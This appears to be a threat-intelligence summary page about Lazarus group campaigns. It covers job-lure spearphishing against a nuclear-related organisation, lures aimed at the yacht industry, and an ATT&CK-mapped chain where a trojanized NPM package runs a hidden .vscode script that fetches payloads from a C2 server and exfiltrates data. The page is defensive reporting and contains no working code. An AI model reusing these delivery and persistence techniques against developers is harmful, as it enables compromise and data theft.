Lazarus group actors are actively targeting specific industries with tailored spearphishing attacks, utilizing trojanized remote access tools and a complex infection chain involving multiple malware stages and C2 communication for persistent access and data exfiltration.
Tag: Lazarus
Engage Report for Lazarus new malware
The Lazarus group targeted employees of a nuclear-related organization with phishing emails containing malicious archive files. The emails were disguised as job opportunities at prominent aerospace and defense companies, aiming to trick the victims into opening the malicious attachments.
Bored BeaverTail & InvisibleFerret Yacht Club – A Lazarus Lure
T1566.001 – The attacker sends a phishing email containing a malicious link to a GitHub repository disguised as a legitimate project.
T1133 – The attacker hosts malicious code, disguised as an NPM package, on a public GitHub repository.
T1059.003 – The victim, a developer, uses the npm install command to install the malicious NPM package from the GitHub repository.
T1543 – The malicious NPM package contains a script that executes a malicious JavaScript file (‘test.js’) located in the ‘.vscode’ folder, establishing persistence on the victim’s machine.
T1071.001 – The malicious JavaScript file uses the cURL command to communicate with the attacker’s C2 server over HTTP to download additional payloads.
T1041 – The attacker uses the established C2 channel to exfiltrate sensitive data from the victim’s machine.
Lazarus Lure in Yacht club
The Lazarus group is conducting a spearphishing campaign targeting individuals involved in the maritime industry, particularly yacht and luxury vessel sales, using malicious attachments to deliver malware.